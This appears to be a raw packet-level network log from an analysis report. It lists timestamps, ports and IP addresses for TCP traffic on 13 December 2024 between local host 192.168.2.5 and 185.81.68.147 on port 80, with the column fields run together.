                                                                                                                                                                Dec 13, 2024 01:37:11.483169079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.483341932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.483443975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.484065056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.484180927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.484253883 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.485002041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.485148907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.485223055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.485897064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.486021996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.486095905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.486804962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.486912966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.486985922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.487775087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.487886906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.487960100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.488636971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.488771915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.488848925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.489556074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.489669085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.489744902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.490443945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.490547895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.490622044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.491362095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.491467953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.491540909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.492275953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.492369890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.492450953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.493174076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.493380070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.493459940 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.494076967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.494196892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.494270086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.494985104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.495100975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.495174885 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.495891094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.496006012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.496081114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.496798992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.496916056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.496989965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.497759104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.497838020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.497911930 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.498639107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.498749018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.498825073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.499571085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.499649048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.499727011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.500416994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.551541090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.644607067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.644638062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.644810915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.644870043 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.644946098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.644992113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.645735979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.645859957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.645970106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.646629095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.646718979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.646804094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.647553921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.647665977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.647747993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.648463011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.648576975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.648658991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.649363041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.649564981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.649642944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.650274992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.650448084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.650526047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.651210070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.651341915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.651422024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.652127028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.652220964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.652302980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.653016090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.653106928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.653186083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.653909922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.654020071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.654098034 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.654819012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.654963970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.655042887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.655716896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.655837059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.655915022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.656629086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.656744003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.656826019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.657538891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.657648087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.657723904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.658449888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.658565998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.658643961 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.659359932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.659468889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.659544945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.660303116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.660378933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.660458088 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.661192894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.661288977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.661367893 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.662132978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.662271023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.662348032 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.663341045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.663501978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.663579941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.663913012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.664016962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.664093971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.664798975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.664920092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.664990902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.665721893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.665834904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.665910006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.666631937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.666742086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.666819096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.667547941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.667655945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.667738914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.668441057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.668559074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.668633938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.669352055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.669480085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.669554949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.670269012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.670392036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.670465946 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.671200037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.671303988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.671380043 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.672110081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.672230005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.672367096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.672992945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.673120022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.673196077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.673921108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.674021006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.674098015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.674810886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.674923897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.675002098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.675754070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.675837040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.675914049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.676745892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.676820993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.676902056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.677544117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.677655935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.677732944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.678452969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.678570986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.678647995 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.679356098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.679469109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.679550886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.680341959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.680367947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.680440903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.681231976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.681313992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.681391001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.682087898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.682202101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.682277918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.683001995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.683120012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.683197975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.683976889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.684084892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.684161901 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.684834003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.684930086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.685007095 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.685733080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.685858965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.685937881 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.686686993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.686757088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.686835051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.687577009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.687705040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.687779903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.688461065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.688689947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.688766956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.689384937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.689507008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.689584017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.690299034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.690504074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.690581083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.691200018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.691319942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.691395998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.692089081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.739095926 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.836653948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.836700916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.836807966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.836987019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.837191105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.837268114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.837888002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.838012934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.838095903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.838793039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.838845968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.838923931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.839699984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.839795113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.839874029 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.840600967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.840734959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.840811014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.841519117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.841731071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.841808081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.842421055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.842530966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.842614889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.843343019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.843441963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.843528032 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.844239950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.844345093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.844425917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.845156908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.845268965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.845350027 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.846064091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.846164942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.846242905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.846967936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.847074986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.847155094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.847932100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.848037958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.848114967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.848808050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.848918915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.848994970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.849699974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.849797010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.849873066 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.850609064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.850732088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.850809097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.851516962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.851634979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.851715088 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.852436066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.852557898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.852637053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.853355885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.853456020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.853533983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.854247093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.854338884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.854415894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.855168104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.855304003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.856082916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.856182098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.857007980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.857117891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.857888937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.858009100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.858815908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.858887911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.859724045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.859777927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.860490084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.860634089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.860754967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.860831022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.861596107 CET8049707185.81.68.147192.168.2.5
